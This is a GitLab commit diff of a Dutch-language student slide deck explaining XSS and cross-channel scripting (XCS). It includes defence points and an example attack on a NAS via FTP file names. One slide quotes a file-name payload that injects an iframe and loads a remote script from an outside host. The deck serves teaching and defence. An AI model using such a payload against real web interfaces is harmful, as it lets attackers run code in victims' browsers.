Skip to content
Projects
Groups
Snippets
Help
Loading...
Help
Support
Keyboard shortcuts
?
Submit feedback
Contribute to GitLab
Sign in
Toggle navigation
U
uva
Project overview
Project overview
Details
Activity
Releases
Repository
Repository
Files
Commits
Branches
Tags
Contributors
Graph
Compare
Issues
0
Issues
0
List
Boards
Labels
Milestones
Merge Requests
0
Merge Requests
0
CI / CD
CI / CD
Pipelines
Jobs
Schedules
Analytics
Analytics
CI / CD
Repository
Value Stream
Wiki
Wiki
Members
Members
Collapse sidebar
Close sidebar
Activity
Graph
Create a new issue
Jobs
Commits
Issue Boards
Open sidebar
Taddeüs Kroes
uva
Commits
c78f53ce
Commit
c78f53ce
authored
May 09, 2011
by
Taddeüs Kroes
Browse files
Options
Browse Files
Download
Email Patches
Plain Diff
Portfolio xcs: fixed some typo's.
parent
39973c54
Changes
1
Show whitespace changes
Inline
Side-by-side
Showing
1 changed file
with
14 additions
and
11 deletions
+14
-11
portfolio/xcs/xcs.tex
portfolio/xcs/xcs.tex
+14
-11
No files found.
portfolio/xcs/xcs.tex
View file @
c78f53ce
...
...
@@ -37,9 +37,10 @@
\frametitle
{
Cross Site Scripting (XSS)
}
\begin{itemize}
\item
Invoegen van scripts op een webpagina door slechte validatie
\item
Web to web
\item
persistent of non-persistent
\item
Invoegen van scripts op een webpagina door te profiteren van
slechte validatie
%\item Infectie en executie gaan beide via de web interface
\item
Persistent of non-persistent
\end{itemize}
}
...
...
@@ -74,19 +75,20 @@
\begin{verbatim}
aanvaller -> non-web protocol -> non-web service
|
doelwit <- H
H
TP <- web service
doelwit <- H
T
TP <- web service
\end{verbatim}
\item
Persistent
\item
Twee op zichzelf veilige services A en B zijn samen onveilig
\item
Twee op zichzelf veilige services kunnen in samenwerking onveilig
zijn
\item
Moeilijker te detecteren dan XSS
\end{itemize}
}
\frame
{
\frametitle
{
Voorbeeld X
SC
: FTP exploit
}
\frametitle
{
Voorbeeld X
CS
: FTP exploit
}
NAS
upload bestanden naar
web-interface, kunnen we een script
NAS
is te benaderen via een
web-interface, kunnen we een script
meesturen in de bestandsnaam?
\\
\vspace
{
4mm
}
\textbf
{
Uitdagingen
}
...
...
@@ -101,11 +103,11 @@ doelwit <- HHTP <- web service
\frametitle
{
Voorbeeld XSC: FTP exploit (2)
}
\begin{verbatim}
"<iframe onload='
javascript:document.write(
<iframe onload=`
javascript:document.write(
&
apos;<html><head><
&
#47;head><body><script src
=
&
quot;http
&
#58;
&
#47;a52.us
&
#47;t2.js
&
quot;>
<
&
#47;script><
&
#47;body><
&
#47;html>
&
apos;);'
src='index.htm'>
"
src='index.htm'>
.pdf
\end{verbatim}
\begin{itemize}
...
...
@@ -185,7 +187,7 @@ aanvaller -> HTTP -> web service
stuurt ``raw'' data
\item
Twitter: escape bij invoer (input time)
$
\rightarrow
$
derde partij
moet unescapen voor eigen format
$
\rightarrow
$
foutgevoelig
\item
Facebook: escape
bij uitvoer (display time)
$
\rightarrow
$
derde
\item
Facebook: escape
at display time
$
\rightarrow
$
derde
partij moet zelf escapen, dit gebeurt soms niet
\end{itemize}
}
...
...
@@ -198,7 +200,8 @@ aanvaller -> HTTP -> web service
\begin{itemize}
\item
Encoding/escaping
\item
Valideren van onvertrouwde HTML-uitvoer
\item
Statische analyse van onvertrouwde HTML-uitvoer
\item
Flow analysis
\item
Extra validatie bovenop cookies
\item
Blokkeren van scripts door gebruiker
\end{itemize}
...
...
Write
Preview
Markdown
is supported
0%
Try again
or
attach a new file
Attach a file
Cancel
You are about to add
0
people
to the discussion. Proceed with caution.
Finish editing this message first!
Cancel
Please
register
or
sign in
to comment